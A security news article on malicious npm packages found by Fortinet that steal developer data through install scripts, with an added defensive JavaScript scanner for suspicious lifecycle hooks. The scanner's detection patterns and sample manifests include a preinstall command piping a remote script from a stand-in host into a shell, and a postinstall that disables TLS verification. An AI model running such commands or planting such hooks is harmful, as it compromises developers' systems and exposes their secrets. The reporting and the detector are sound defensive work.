Over 3 Dozen Data-Stealing Malicious npm Packages Found Targeting Developers
Close to thirty-six counterfeit packages have been found in the npm package registry. These packages are built to quietly harvest sensitive data from developers' systems, according to research published by Fortinet FortiGuard Labs.
In addition, the firm identified a further set of four modules, namely binarium-crm, career-service-client-0.1.6, hh-dep-monitoring, and orbitplate, that retrieve source code and configuration files without authorization. The targeted files and directories can hold valuable intellectual property and sensitive information, including credentials for various applications and services. The stolen data is packaged into archives and uploaded to an FTP server.
Furthermore, some of these malicious packages have been observed using a Discord webhook for the exfiltration of sensitive data, while a few others are engineered to automatically download and execute potentially malicious executable files from external URLs.
In an unusual twist, a rogue package named @cima/prism-utils used an install script to disable TLS certificate validation by setting NODE_TLS_REJECT_UNAUTHORIZED=0. With that variable set, the Node.js process accepts any certificate, which exposes its connections to man-in-the-middle (MitM) attacks.
The company grouped the identified modules into nine categories based on shared code and functionality. Most of the packages rely on npm install scripts, executed as preinstall or postinstall actions, to carry out the data harvesting.
The researchers have advised end users to remain vigilant for packages employing suspicious install scripts and to exercise caution when dealing with such packages.
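The following is an added example, not code from Fortinet or from the article, of the kind of check that advice implies: it inspects the lifecycle scripts in a package.json for the behaviours reported above (disabling TLS verification, Discord webhooks, downloading and executing remote files, FTP uploads). It assumes package.json text is passed in as a string; the indicator patterns and the sample manifests are constructed for illustration and are not FortiGuard's signatures or the real packages' contents.

```javascript
// Added example, not Fortinet's code: flag npm lifecycle scripts that show the
// behaviours reported in the article. Assumptions: package.json text is passed in
// as a string, and the indicator regexes are illustrative, not FortiGuard signatures.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Each indicator pairs a label with a regex matched against the script command line.
const INDICATORS = [
  { name: "tls-verification-disabled", re: /NODE_TLS_REJECT_UNAUTHORIZED\s*=\s*0\b/ },
  { name: "discord-webhook", re: /discord(app)?\.com\/api\/webhooks\//i },
  { name: "remote-download-and-run", re: /\b(curl|wget)\b[^|;&]*\|\s*(sh|bash|node)\b/ },
  { name: "ftp-upload", re: /\bftp:\/\//i },
];

// Returns one finding per (hook, indicator) match found in a single package.json.
function auditManifest(manifestText) {
  const pkg = JSON.parse(manifestText);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue; // hook not defined: nothing runs at install
    for (const { name, re } of INDICATORS) {
      if (re.test(cmd)) findings.push({ package: pkg.name, hook, indicator: name, command: cmd });
    }
  }
  return findings;
}

// Audits a list of manifests (e.g. every node_modules/*/package.json read with fs).
function auditAll(manifests) {
  return manifests.flatMap((text) => auditManifest(text));
}

// Constructed sample manifests; these are not the real packages named in the article.
const SAMPLE_MANIFESTS = [
  JSON.stringify({ name: "constructed-sample-a", version: "1.0.0",
    scripts: { postinstall: "NODE_TLS_REJECT_UNAUTHORIZED=0 node setup.js" } }),
  JSON.stringify({ name: "constructed-sample-b", version: "0.0.1",
    scripts: { preinstall: "curl -s https://example.invalid/run.sh | sh",
               test: "curl https://example.invalid/t.sh | sh" } }), // "test" is not an install hook
  JSON.stringify({ name: "clean-sample", version: "2.1.0", scripts: { test: "jest" } }),
];

for (const f of auditAll(SAMPLE_MANIFESTS)) {
  console.log(`${f.package}: ${f.hook} -> ${f.indicator} (${f.command})`);
}
```

Only the two lifecycle hooks are reported; the identical command under `test` is ignored because it never runs during `npm install`. Setting npm's `ignore-scripts` option blocks lifecycle scripts outright, at the cost of breaking packages that legitimately need them.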